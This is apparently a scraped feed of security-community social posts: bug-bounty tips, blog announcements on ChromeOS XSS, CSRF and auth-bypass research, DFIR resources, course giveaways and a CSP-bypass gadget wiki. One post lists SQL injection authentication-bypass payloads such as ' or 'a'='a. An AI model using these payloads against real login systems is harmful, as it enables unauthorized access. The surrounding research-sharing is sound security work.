🔍 My ultimate workflow for simple and easy JavaScript Analysis ⚡️ Comprehensive JavaScript analysis in offensive security, appsec testing, and red teaming wins. Often you can find juicy hidden endpoints, parameters, & domains buried JS! A thread 🧵 1/x 👇

My first blog post! It's about CVE-2023-4369, a $10,000 bug I found in ChromeOS in July. The bug used a chrome:// URL XSS to allow Chrome extensions to execute privileged code and read/edit downloaded files without user interaction. 👀 0x44.xyz/blog/cve-2023-…

🧵Can you work out how to bypass this vulnerable CSRF protection? Read all about this gotcha in my latest blog post

The detailed version of our #WorstFit attack is available now! 🔥 Check it out! 👉 blog.orange.tw/posts/2025-01-… cc: splitline 👁️🐈‍⬛

Want to explore macOS/iOS DFIR but dont know where to begin? Check out post on exploring macOS/iOS DFIR providing a range of free resources to help you succeed: malwr4n6.com/post/exploring… #macos #ios #CTF #digitalforensics #DFIR #apple

Speed up your Bug Bounty & Pentest reporting! I've built a Custom Action to instantly capture & annotate screenshots without leaving Burp. Download it from our GitHub or import directly into your Bambda! github.com/PortSwigger/ba…

Guillermo Rauch Timely guide on how to migrate from Vercel to Cloudflare: x.com/osintly/status…

Who's still on Reddit? Here's a list of 37 cybersecurity Subreddits you may or may not know about 👇 hakluke.com/list-of-cybers…

🚨 New blog post: Authentication Bypass to RCE in Versa Concerto (0-Day) Our research team discovered a critical authentication bypass leading to remote code execution in Versa Concerto, an enterprise SD-WAN orchestration product used by major telecoms and large corporations.

Bypass Auth- Via SQL Injection Payloads #bugbountytips #bugbountytips ' or 'a'='a ' or a=a-- ' or a=a– ') or ('a'='a " or "a"="a ") or ("a"="a ') or ('a'='a and hi") or ("a"="a ' or 'one'='one ' or 'one'='one– ' or uid like '% ' or uname like '% ' or userid like '%

🎉 GIVEAWAY TIME! 🎉 Win access to our OSINT Course & Certification Exam (worth $349). Perfect for anyone looking to break into, or level up their OSINT career! Includes: 📘 Learn OSINT from Scratch course 🎓 C|OSINT|P Exam & Certification - zsecurity.org/cosintp How to

🚨 OSCP GIVEAWAY ALERT🚨 We’re giving away 3 OSCP vouchers to supercharge your pentesting journey – proudly sponsored by OffSec ! 💥🙌 To enter: 1.✅ Follow Us 2.🔁 Retweet this post 3.❤️ Like this post 4.💬 Reply with your funniest cybersecurity meme 🎯 We’ll pick 3

Ayadim bugcrowd Check out this thread: linkedin.com/posts/mrjoeyme…

I'm happy to release a script gadgets wiki inspired by the work of Sebastian Lekies, koto, and Eduardo Vela in their Black Hat USA 2017 talk! 🔥 The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇 gmsgadget.com 1/4